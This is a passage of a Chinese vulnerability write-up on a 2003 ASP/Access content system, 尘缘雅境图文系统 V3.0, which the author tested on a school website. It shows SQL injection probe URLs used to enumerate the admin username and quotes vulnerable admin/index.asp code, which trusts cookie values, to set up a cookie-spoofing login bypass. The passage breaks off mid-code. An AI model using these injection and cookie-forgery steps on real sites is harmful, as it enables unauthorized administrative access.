[前言] “尘缘雅境图文系统“ 是由杨正炎、雪域一线天独立开发的系统,虽然没有动网的影响大,但是作为一个免费的全站系统,拥有强大的后台功能,还是受很多人青睐的,包括一个很有名气的书盟。因为学院网站用的最新V3.0 Access版 build 20030123,同学让测试一下(其实服务器的安全就很垃圾),没想到漏洞多多!小弟第一次写文章,废话很多,,见谅!马上进入正题! [涉及版本] “尘缘雅境图文系统V3.0 ACCESS版 build 20030123(因为时间的关系偶没有测试别的版本! [描述] 很多地方没有对用户身份进行有效验证,最严重的可以通过COOKIE欺骗直接进入管理页面。还有就是大家很熟悉的跨表查询了。 [具体如下:] 因为很多地方都存在相同的漏洞,我们还是以通过COOKIE欺骗直接进入管理页面为例,危害大嘛,呵呵!:) 首先我们利用跨表查询获得管理员的用户名。为什么?看下文。 http://www.yourname.com/ ;ReadNews.ASP?NewsID=1’ 返回 [Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误 没有对特殊符号过滤,GO ON! http://www.yourname.com/ ;ReadNews.asp?NewsID=1 and 1=(select id from admin) 正常显示 ……省略若干次尝试(不要告诉我你不会跨表查询 :( ) 得到管理员用户名:mereor 好了,看admin/index.asp <%dim jingyong set rs=server.createobject("adodb.recordset") sql="select * from admin where username="&Request.cookies("username")&"" rs.open sql,conn,1,3 jingyong=rs("jingyong") rs.close set rs=nothing if Request.cookies("key")="super" or Request.cookies("key")="check" or Request.cookies("KEY")="bigmaster" or Request.cookies("KEY")="smallmaster" or
